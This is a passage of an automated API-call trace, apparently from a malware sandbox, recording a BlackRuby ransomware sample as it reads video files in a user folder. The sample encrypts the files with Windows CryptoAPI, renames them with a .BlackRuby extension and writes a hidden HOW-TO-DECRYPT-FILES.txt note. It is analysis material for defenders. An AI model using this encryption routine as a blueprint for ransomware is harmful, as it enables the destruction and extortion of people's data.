GetLastError () returned 0x0 [0063.329] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.329] GetLastError () returned 0x0 [0063.329] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.329] GetLastError () returned 0x0 [0063.329] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.329] GetLastError () returned 0x0 [0063.330] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.330] GetLastError () returned 0x0 [0063.330] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.330] GetLastError () returned 0x0 [0063.330] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.330] GetLastError () returned 0x0 [0063.330] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0063.330] GetLastError () returned 0x12 [0063.330] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0063.330] SetErrorMode (uMode=0x0) returned 0x1 [0063.330] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst", lpFilePart=0x0) returned 0x2a [0063.330] GetLastError () returned 0x12 [0063.330] SetErrorMode (uMode=0x1) returned 0x0 [0063.330] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0063.330] GetLastError () returned 0x12 [0063.331] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.331] GetLastError () returned 0x12 [0063.331] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.331] GetLastError () returned 0x12 [0063.331] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.331] GetLastError () returned 0x12 [0063.331] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.331] GetLastError () returned 0x12 [0063.331] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.331] GetLastError () returned 0x12 [0063.331] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.331] GetLastError () returned 0x12 [0063.331] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.331] GetLastError () returned 0x12 [0063.332] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0063.332] GetLastError () returned 0x12 [0063.332] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0063.332] SetErrorMode (uMode=0x0) returned 0x1 [0063.332] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi", lpFilePart=0x0) returned 0x43 [0063.332] GetLastError () returned 0x12 [0063.332] SetErrorMode (uMode=0x1) returned 0x0 [0063.332] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\1cgvry0qb5c04mbzajdh.avi"), fInfoLevelId=0x0, lpFileInformation=0x1bfa6fc | out: lpFileInformation=0x1bfa6fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x230a52f0, ftCreationTime.dwHighDateTime=0x1d34e6c, ftLastAccessTime.dwLowDateTime=0xed591a50, ftLastAccessTime.dwHighDateTime=0x1d34fde, ftLastWriteTime.dwLowDateTime=0xed591a50, ftLastWriteTime.dwHighDateTime=0x1d34fde, nFileSizeHigh=0x0, nFileSizeLow=0x4fcb)) returned 1 [0063.332] GetLastError () returned 0x12 [0063.332] SetErrorMode (uMode=0x0) returned 0x1 [0063.332] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi", lpFilePart=0x0) returned 0x43 [0063.332] GetLastError () returned 0x12 [0063.332] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi", lpFilePart=0x0) returned 0x43 [0063.332] GetLastError () returned 0x12 [0063.332] SetErrorMode (uMode=0x1) returned 0x0 [0063.333] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\1cgvry0qb5c04mbzajdh.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.333] GetLastError () returned 0x0 [0063.333] GetFileType (hFile=0x258) returned 0x1 [0063.333] SetErrorMode (uMode=0x0) returned 0x1 [0063.333] GetFileType (hFile=0x258) returned 0x1 [0063.333] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x4fcb [0063.333] GetLastError () returned 0x0 [0063.333] ReadFile (in: hFile=0x258, lpBuffer=0x1bfc754, nNumberOfBytesToRead=0x4fcb, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1bfc754*, lpNumberOfBytesRead=0x18ed18*=0x4fcb, lpOverlapped=0x0) returned 1 [0063.334] GetLastError () returned 0x0 [0063.334] CloseHandle (hObject=0x258) returned 1 [0063.334] GetLastError () returned 0x0 [0063.334] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi", lpFilePart=0x0) returned 0x43 [0063.334] GetLastError () returned 0x0 [0063.334] SetErrorMode (uMode=0x1) returned 0x0 [0063.334] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\1cgvry0qb5c04mbzajdh.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x230a52f0, ftCreationTime.dwHighDateTime=0x1d34e6c, ftLastAccessTime.dwLowDateTime=0xed591a50, ftLastAccessTime.dwHighDateTime=0x1d34fde, ftLastWriteTime.dwLowDateTime=0xed591a50, ftLastWriteTime.dwHighDateTime=0x1d34fde, nFileSizeHigh=0x0, nFileSizeLow=0x4fcb)) returned 1 [0063.334] GetLastError () returned 0x0 [0063.334] SetErrorMode (uMode=0x0) returned 0x1 [0063.334] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c790) returned 1 [0063.334] GetLastError () returned 0x0 [0063.368] CryptImportKey (in: hProv=0x37c790, pbData=0x1c60ae0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360b60) returned 1 [0063.368] GetLastError () returned 0x0 [0063.368] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.368] GetLastError () returned 0x0 [0063.374] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.374] GetLastError () returned 0x0 [0063.374] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360aa0) returned 1 [0063.374] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.374] GetLastError () returned 0x0 [0063.374] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1c8db2c*=0x1, dwFlags=0x0) returned 1 [0063.374] GetLastError () returned 0x0 [0063.374] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1c8daf8, dwFlags=0x0) returned 1 [0063.374] GetLastError () returned 0x0 [0063.374] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c8db74*, pdwDataLen=0x18ed08*=0x50c0, dwBufLen=0x50c0 | out: pbData=0x1c8db74*, pdwDataLen=0x18ed08*=0x50c0) returned 1 [0063.374] GetLastError () returned 0x0 [0063.374] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c97d20*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c97d20*, pdwDataLen=0x18ed20*=0x10) returned 1 [0063.374] GetLastError () returned 0x0 [0063.374] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c97d50*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c97d50*, pdwDataLen=0x18ed28*=0x10) returned 1 [0063.374] GetLastError () returned 0x0 [0063.374] CryptDestroyKey (hKey=0x360b60) returned 1 [0063.374] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.374] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.374] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi", lpFilePart=0x0) returned 0x43 [0063.374] GetLastError () returned 0x0 [0063.374] SetErrorMode (uMode=0x1) returned 0x0 [0063.374] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\1cgvry0qb5c04mbzajdh.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.375] GetLastError () returned 0xb7 [0063.375] GetFileType (hFile=0x258) returned 0x1 [0063.375] SetErrorMode (uMode=0x0) returned 0x1 [0063.375] GetFileType (hFile=0x258) returned 0x1 [0063.376] CloseHandle (hObject=0x258) returned 1 [0063.376] GetLastError () returned 0xb7 [0063.376] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi", lpFilePart=0x0) returned 0x43 [0063.376] GetLastError () returned 0xb7 [0063.377] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\Encrypted_sCiOlMBRzejtw1VAVC47FDEYBt3N5Vf4JphnynzUslB.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\Encrypted_sCiOlMBRzejtw1VAVC47FDEYBt3N5Vf4JphnynzUslB.BlackRuby", lpFilePart=0x0) returned 0x6a [0063.377] GetLastError () returned 0xb7 [0063.377] SetErrorMode (uMode=0x1) returned 0x0 [0063.377] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\1cgvry0qb5c04mbzajdh.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x230a52f0, ftCreationTime.dwHighDateTime=0x1d34e6c, ftLastAccessTime.dwLowDateTime=0xed591a50, ftLastAccessTime.dwHighDateTime=0x1d34fde, ftLastWriteTime.dwLowDateTime=0x2df842a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x50d0)) returned 1 [0063.377] GetLastError () returned 0xb7 [0063.377] SetErrorMode (uMode=0x0) returned 0x1 [0063.377] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\1cgVrY0qb5C04mbZAJdH.avi" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\1cgvry0qb5c04mbzajdh.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\Encrypted_sCiOlMBRzejtw1VAVC47FDEYBt3N5Vf4JphnynzUslB.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\encrypted_sciolmbrzejtw1vavc47fdeybt3n5vf4jphnynzuslb.blackruby")) returned 1 [0063.377] GetLastError () returned 0xb7 [0063.378] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x43 [0063.378] GetLastError () returned 0xb7 [0063.378] SetErrorMode (uMode=0x1) returned 0x0 [0063.378] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.378] GetLastError () returned 0x0 [0063.378] GetFileType (hFile=0x258) returned 0x1 [0063.378] SetErrorMode (uMode=0x0) returned 0x1 [0063.378] GetFileType (hFile=0x258) returned 0x1 [0063.379] CloseHandle (hObject=0x258) returned 1 [0063.379] GetLastError () returned 0x0 [0063.379] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x43 [0063.380] GetLastError () returned 0x0 [0063.380] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0063.380] GetLastError () returned 0x0 [0063.380] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv", lpFilePart=0x0) returned 0x3d [0063.380] GetLastError () returned 0x0 [0063.380] SetErrorMode (uMode=0x1) returned 0x0 [0063.380] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\2cr7su_fty9cru.mkv"), fInfoLevelId=0x0, lpFileInformation=0x1cc3eb4 | out: lpFileInformation=0x1cc3eb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97108a90, ftCreationTime.dwHighDateTime=0x1d34aeb, ftLastAccessTime.dwLowDateTime=0x41ea65d0, ftLastAccessTime.dwHighDateTime=0x1d355d2, ftLastWriteTime.dwLowDateTime=0x41ea65d0, ftLastWriteTime.dwHighDateTime=0x1d355d2, nFileSizeHigh=0x0, nFileSizeLow=0xb516)) returned 1 [0063.380] GetLastError () returned 0x0 [0063.380] SetErrorMode (uMode=0x0) returned 0x1 [0063.380] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv", lpFilePart=0x0) returned 0x3d [0063.380] GetLastError () returned 0x0 [0063.380] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv", lpFilePart=0x0) returned 0x3d [0063.380] GetLastError () returned 0x0 [0063.380] SetErrorMode (uMode=0x1) returned 0x0 [0063.380] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\2cr7su_fty9cru.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.381] GetLastError () returned 0x0 [0063.381] GetFileType (hFile=0x258) returned 0x1 [0063.381] SetErrorMode (uMode=0x0) returned 0x1 [0063.381] GetFileType (hFile=0x258) returned 0x1 [0063.381] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xb516 [0063.381] GetLastError () returned 0x0 [0063.381] ReadFile (in: hFile=0x258, lpBuffer=0x1cc5d14, nNumberOfBytesToRead=0xb516, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1cc5d14*, lpNumberOfBytesRead=0x18ed18*=0xb516, lpOverlapped=0x0) returned 1 [0063.382] GetLastError () returned 0x0 [0063.382] CloseHandle (hObject=0x258) returned 1 [0063.382] GetLastError () returned 0x0 [0063.382] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv", lpFilePart=0x0) returned 0x3d [0063.382] GetLastError () returned 0x0 [0063.382] SetErrorMode (uMode=0x1) returned 0x0 [0063.382] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\2cr7su_fty9cru.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97108a90, ftCreationTime.dwHighDateTime=0x1d34aeb, ftLastAccessTime.dwLowDateTime=0x41ea65d0, ftLastAccessTime.dwHighDateTime=0x1d355d2, ftLastWriteTime.dwLowDateTime=0x41ea65d0, ftLastWriteTime.dwHighDateTime=0x1d355d2, nFileSizeHigh=0x0, nFileSizeLow=0xb516)) returned 1 [0063.382] GetLastError () returned 0x0 [0063.382] SetErrorMode (uMode=0x0) returned 0x1 [0063.397] CryptImportKey (in: hProv=0x37c680, pbData=0x1d36b1c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360f20) returned 1 [0063.397] GetLastError () returned 0x0 [0063.397] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.397] GetLastError () returned 0x0 [0063.429] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.429] GetLastError () returned 0x0 [0063.429] CryptDuplicateKey (in: hKey=0x360f20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360ee0) returned 1 [0063.429] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.429] GetLastError () returned 0x0 [0063.429] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1b68a1c*=0x1, dwFlags=0x0) returned 1 [0063.429] GetLastError () returned 0x0 [0063.429] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1b689e8, dwFlags=0x0) returned 1 [0063.429] GetLastError () returned 0x0 [0063.429] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b68a64*, pdwDataLen=0x18ed08*=0xb610, dwBufLen=0xb610 | out: pbData=0x1b68a64*, pdwDataLen=0x18ed08*=0xb610) returned 1 [0063.430] GetLastError () returned 0x0 [0063.430] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b7f6b0*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b7f6b0*, pdwDataLen=0x18ed20*=0x10) returned 1 [0063.430] GetLastError () returned 0x0 [0063.430] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b7f6e0*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b7f6e0*, pdwDataLen=0x18ed28*=0x10) returned 1 [0063.430] GetLastError () returned 0x0 [0063.430] CryptDestroyKey (hKey=0x360f20) returned 1 [0063.430] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.430] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.430] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv", lpFilePart=0x0) returned 0x3d [0063.430] GetLastError () returned 0x0 [0063.430] SetErrorMode (uMode=0x1) returned 0x0 [0063.430] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\2cr7su_fty9cru.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.431] GetLastError () returned 0xb7 [0063.431] GetFileType (hFile=0x258) returned 0x1 [0063.431] SetErrorMode (uMode=0x0) returned 0x1 [0063.431] GetFileType (hFile=0x258) returned 0x1 [0063.433] CloseHandle (hObject=0x258) returned 1 [0063.433] GetLastError () returned 0xb7 [0063.433] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv", lpFilePart=0x0) returned 0x3d [0063.433] GetLastError () returned 0xb7 [0063.433] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\Encrypted_NMWAyyG9xXdWrCEV2RrDWzI4mRX68UmYTtguJf8nf6O.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\Encrypted_NMWAyyG9xXdWrCEV2RrDWzI4mRX68UmYTtguJf8nf6O.BlackRuby", lpFilePart=0x0) returned 0x6a [0063.433] GetLastError () returned 0xb7 [0063.433] SetErrorMode (uMode=0x1) returned 0x0 [0063.433] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\2cr7su_fty9cru.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97108a90, ftCreationTime.dwHighDateTime=0x1d34aeb, ftLastAccessTime.dwLowDateTime=0x41ea65d0, ftLastAccessTime.dwHighDateTime=0x1d355d2, ftLastWriteTime.dwLowDateTime=0x2e01c820, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xb620)) returned 1 [0063.433] GetLastError () returned 0xb7 [0063.433] SetErrorMode (uMode=0x0) returned 0x1 [0063.433] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\2Cr7sU_FTY9crU.mkv" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\2cr7su_fty9cru.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\Encrypted_NMWAyyG9xXdWrCEV2RrDWzI4mRX68UmYTtguJf8nf6O.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\encrypted_nmwayyg9xxdwrcev2rrdwzi4mrx68umyttgujf8nf6o.blackruby")) returned 1 [0063.434] GetLastError () returned 0xb7 [0063.434] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x43 [0063.434] GetLastError () returned 0xb7 [0063.434] SetErrorMode (uMode=0x1) returned 0x0 [0063.434] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\xvi_eedww lzft5lst\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0063.434] GetLastError () returned 0x5 [0063.435] SetErrorMode (uMode=0x0) returned 0x1 [0063.435] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\k dgD2M1TPxZ9J.flv", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: 